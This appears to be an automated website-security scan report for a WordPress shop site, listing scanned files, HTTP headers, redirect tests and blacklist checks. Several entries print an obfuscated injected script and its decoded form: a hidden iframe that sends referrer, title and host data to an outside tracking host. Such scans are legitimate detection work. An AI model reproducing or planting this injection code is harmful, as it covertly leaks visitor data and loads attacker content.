Scanned pages/files
Request | Server response | Status |
http://wolfhardt.com/ | 200 OK Content-Length: 37103 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[621 bytes skipped]... Decoded script: var referer = encodeURIComponent(document.referrer); var default_keyword = encodeURIComponent(document.title); var host = encodeURIComponent(location.host); var iframe = document.createElement('iframe'); iframe.width=0; iframe.height=0; iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host; document.body.appendChild(iframe); | ||
http://wolfhardt.com/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 95977 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-content/themes/room09_2/theme/assets/js/jquery.commonlibraries.js | 200 OK Content-Length: 75021 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-content/themes/room09_2/core/assets/js/jquery.placeholder.js | 200 OK Content-Length: 1709 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-content/themes/room09_2/theme/assets/js/yit/jquery.layout.js | 200 OK Content-Length: 4587 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-content/themes/room09_2/js/jquery.custom.js | 200 OK Content-Length: 4880 Content-Type: application/javascript | clean |
http://wolfhardt.com//wolfhardt.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 20 Sep 2015 18:11:24 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js/ Server: - Web acceleration by http://www.unixy.net/varnish Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS X-Cacheable: YES X-Pingback: http://wolfhardt.com/xmlrpc.php X-Powered-By: PHP/5.3.28 X-Varnish: 1997965355 | clean |
http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockui.min.js/ | 404 Not Found Content-Length: 29547 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[621 bytes skipped]... Decoded script: var referer = encodeURIComponent(document.referrer); var default_keyword = encodeURIComponent(document.title); var host = encodeURIComponent(location.host); var iframe = document.createElement('iframe'); iframe.width=0; iframe.height=0; iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host; document.body.appendChild(iframe); | ||
http://wolfhardt.com//wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 20 Sep 2015 18:11:25 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js/ Server: - Web acceleration by http://www.unixy.net/varnish Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS X-Cacheable: YES X-Pingback: http://wolfhardt.com/xmlrpc.php X-Powered-By: PHP/5.3.28 X-Varnish: 1997965369 | clean |
http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js/ | 404 Not Found Content-Length: 29529 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[621 bytes skipped]... Decoded script: var referer = encodeURIComponent(document.referrer); var default_keyword = encodeURIComponent(document.title); var host = encodeURIComponent(location.host); var iframe = document.createElement('iframe'); iframe.width=0; iframe.height=0; iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host; document.body.appendChild(iframe); | ||
http://wolfhardt.com/wp-content/themes/room09_2/core/assets/js/jq-cookie.js | 200 OK Content-Length: 679 Content-Type: application/javascript | clean |
http://wolfhardt.com//wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 20 Sep 2015 18:11:27 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js/ Server: - Web acceleration by http://www.unixy.net/varnish Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS X-Cacheable: YES X-Pingback: http://wolfhardt.com/xmlrpc.php X-Powered-By: PHP/5.3.28 X-Varnish: 1997965376 | clean |
http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js/ | 404 Not Found Content-Length: 29535 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[621 bytes skipped]... Decoded script: var referer = encodeURIComponent(document.referrer); var default_keyword = encodeURIComponent(document.title); var host = encodeURIComponent(location.host); var iframe = document.createElement('iframe'); iframe.width=0; iframe.height=0; iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host; document.body.appendChild(iframe); | ||
http://wolfhardt.com/wp-content/plugins/yith-woocommerce-compare/assets/js/woocompare.js | 200 OK Content-Length: 8741 Content-Type: application/javascript | clean |
http://wolfhardt.com/wp-content/plugins/yith-woocommerce-compare/assets/js/jquery.colorbox-min.js | 200 OK Content-Length: 11825 Content-Type: application/javascript | clean |
http://wolfhardt.com//wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyPhoto/jquery.prettyPhoto.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 20 Sep 2015 18:11:28 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyPhoto/jquery.prettyPhoto.min.js/ Server: - Web acceleration by http://www.unixy.net/varnish Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS X-Cacheable: YES X-Pingback: http://wolfhardt.com/xmlrpc.php X-Powered-By: PHP/5.3.28 X-Varnish: 1997965386 | clean |
http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyphoto/jquery.prettyphoto.min.js/ | 404 Not Found Content-Length: 29549 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[621 bytes skipped]... Decoded script: var referer = encodeURIComponent(document.referrer); var default_keyword = encodeURIComponent(document.title); var host = encodeURIComponent(location.host); var iframe = document.createElement('iframe'); iframe.width=0; iframe.height=0; iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host; document.body.appendChild(iframe); | ||
http://wolfhardt.com//wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyPhoto/jquery.prettyPhoto.init.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 20 Sep 2015 18:11:29 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyPhoto/jquery.prettyPhoto.init.min.js/ Server: - Web acceleration by http://www.unixy.net/varnish Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS X-Cacheable: YES X-Pingback: http://wolfhardt.com/xmlrpc.php X-Powered-By: PHP/5.3.28 X-Varnish: 1997965391 | clean |
http://wolfhardt.com/wolfhardt.com/wp-content/plugins/woocommerce/assets/js/prettyphoto/jquery.prettyphoto.init.min.js/ | 404 Not Found Content-Length: 29559 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[621 bytes skipped]... Decoded script: var referer = encodeURIComponent(document.referrer); var default_keyword = encodeURIComponent(document.title); var host = encodeURIComponent(location.host); var iframe = document.createElement('iframe'); iframe.width=0; iframe.height=0; iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host; document.body.appendChild(iframe); |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wolfhardt.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Sep 2015 18:11:21 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Server: - Web acceleration by http://www.unixy.net/varnish
Vary: Accept-Encoding,User-Agent
Content-Length: 37103
Content-Type: text/html; charset=UTF-8
Link: <http://wolfhardt.com/>; rel=shortlink
X-Cache: HIT
X-Cache-Hits: 1
X-Cacheable: YES
X-Pingback: http://wolfhardt.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
X-Varnish: 1997965283 1997965281
...37103 bytes of data.
GET / HTTP/1.1
Host: wolfhardt.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Sep 2015 18:11:21 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Server: - Web acceleration by http://www.unixy.net/varnish
Vary: Accept-Encoding,User-Agent
Content-Length: 37103
Content-Type: text/html; charset=UTF-8
Link: <http://wolfhardt.com/>; rel=shortlink
X-Cache: HIT
X-Cache-Hits: 1
X-Cacheable: YES
X-Pingback: http://wolfhardt.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
X-Varnish: 1997965283 1997965281
...37103 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wolfhardt.com
Referer: http://www.google.com/search?q=wolfhardt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wolfhardt.com
Referer: http://www.google.com/search?q=wolfhardt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wolfhardt.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wolfhardt.com/
Result: wolfhardt.com is not infected or malware details are not published yet.
Result: wolfhardt.com is not infected or malware details are not published yet.